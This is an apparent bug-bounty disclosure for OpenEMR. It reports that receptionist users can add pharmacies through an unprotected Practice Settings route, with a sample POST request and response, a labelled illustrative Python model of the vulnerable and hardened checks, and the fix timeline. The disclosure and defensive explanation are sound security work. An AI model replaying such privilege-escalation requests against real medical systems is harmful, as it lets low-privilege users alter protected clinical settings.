Broken Access Controls in Practice Settings in openemr/openemr


Reported on

Dec 26th 2022


We observed that a receptionist user can add a Pharmacy in the Practice Settings section, although this area is restricted to receptionist users.

Proof of Concept


POST /openemr/controller.php?practice_settings&pharmacy&action=edit HTTP/1.1
Cookie: OpenEMR=<receptionist user's cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 144



HTTP/1.1 302 Found
Server: nginx/1.21.1
Date: Mon, 26 Dec 2022 09:02:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /openemr/controller.php?practice_settings&pharmacy&action=list
Content-Length: 9246

<!DOCTYPE html>
    <title>Practice Settings</title>

<meta charset="utf-8" />

PoC Images

After we send the request above: [image]

There is a new pharmacy added: [image]


This vulnerability allows a front desk user to add any pharmacy, which could break the logic of the application.
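The report shows the defining pattern of a broken access control: the Practice Settings entry is hidden from front desk users in the UI, but the `controller.php?practice_settings&pharmacy&action=edit` route accepts any authenticated session. The following added example (not OpenEMR's code, and not the researcher's PoC) models that route to show the difference between a client-side restriction and a server-side check. The role names, the permission map, the `Request`/`Response` types and the audit-log fields are assumptions made for illustration; OpenEMR's real ACL is richer than this.

```python
# Added example (not OpenEMR's code): a minimal model of the
# controller.php?practice_settings&pharmacy&action=edit route from the report.
# Role names, the permission map and the request/log structures are assumptions
# made for illustration; OpenEMR's real ACL is richer than this.
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed role -> permission map: only admins may read or change practice settings.
PERMISSIONS: Dict[str, Set[str]] = {
    "admin": {"practice_settings:read", "practice_settings:write"},
    "receptionist": {"patients:read", "appointments:write"},
}
WRITE_ACTIONS = {"edit", "delete"}


@dataclass
class Request:
    method: str
    query: str                      # e.g. "practice_settings&pharmacy&action=edit"
    session_role: str               # role bound to the session cookie (assumed, for illustration)
    form: Dict[str, str] = field(default_factory=dict)


@dataclass
class Response:
    status: int
    location: Optional[str] = None


def parse_route(query: str):
    """Split 'module&sub&action=edit' into (module, sub, action); action defaults to 'list'."""
    parts = query.split("&")
    params = dict(p.split("=", 1) for p in parts if "=" in p)
    plain = [p for p in parts if "=" not in p]
    module = plain[0] if plain else ""
    sub = plain[1] if len(plain) > 1 else ""
    return module, sub, params.get("action", "list")


def required_permission(method: str, action: str, module: str) -> str:
    """Any state-changing request needs the module's write permission; everything else needs read."""
    if method == "POST" or action in WRITE_ACTIONS:
        return f"{module}:write"
    return f"{module}:read"


def is_authorized(role: str, method: str, query: str) -> bool:
    module, _sub, action = parse_route(query)
    return required_permission(method, action, module) in PERMISSIONS.get(role, set())


def vulnerable_controller(req: Request, pharmacies: List[str]) -> Response:
    """Before: the only 'restriction' is a hidden menu entry in the UI.
    Any authenticated session that sends the POST directly reaches the write action."""
    module, sub, action = parse_route(req.query)
    if module == "practice_settings" and sub == "pharmacy" and action == "edit" and req.method == "POST":
        pharmacies.append(req.form.get("name", ""))
        return Response(302, f"/openemr/controller.php?{module}&{sub}&action=list")
    return Response(200)


def hardened_controller(req: Request, pharmacies: List[str]) -> Response:
    """After: the permission is derived from the route and checked server-side on every
    action in the module, before any state change. Denied requests get 403, not a redirect."""
    if not is_authorized(req.session_role, req.method, req.query):
        return Response(403)
    return vulnerable_controller(req, pharmacies)


def audit_violations(entries: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Defender's view: replay an audit log (constructed fields: user, role, method, query)
    through the permission check to find requests the unpatched code should have refused."""
    return [e for e in entries if not is_authorized(e["role"], e["method"], e["query"])]


if __name__ == "__main__":
    receptionist_post = Request("POST", "practice_settings&pharmacy&action=edit",
                                "receptionist", {"name": "Example Pharmacy"})
    before: List[str] = []
    print("before:", vulnerable_controller(receptionist_post, before).status, before)  # 302 ['Example Pharmacy']
    after: List[str] = []
    print("after: ", hardened_controller(receptionist_post, after).status, after)      # 403 []
```

The check is placed on the module as a whole rather than on the one `edit` action that the report exercises, so `list` and `delete` under `practice_settings` are covered by the same rule; `audit_violations` is the same predicate run over existing logs, which is how a deployment that ran the unpatched version can find out whether the route was actually used by non-admin sessions.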

We are processing your report and will contact the openemr team within 24 hours. a year ago
We have contacted a member of the openemr team and are waiting to hear back a year ago
openemr/openemr maintainer has acknowledged this report a year ago
Brady Miller validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller
a year ago


This is fixed in master branch at

@Nhien.IT, @admin, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after release OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a cve).

thanks for the report @Nhien.IT !

a year ago


Hi @maintainer,

Thanks for your effort, I hope to publish a fix version soon.


7 months ago


Hi @maintainer,

I have received mail about 7.0.1 version being published. Any update here?

Brady Miller marked this as fixed in 7.0.1 with commit bb4244 7 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Brady Miller published this vulnerability 7 months ago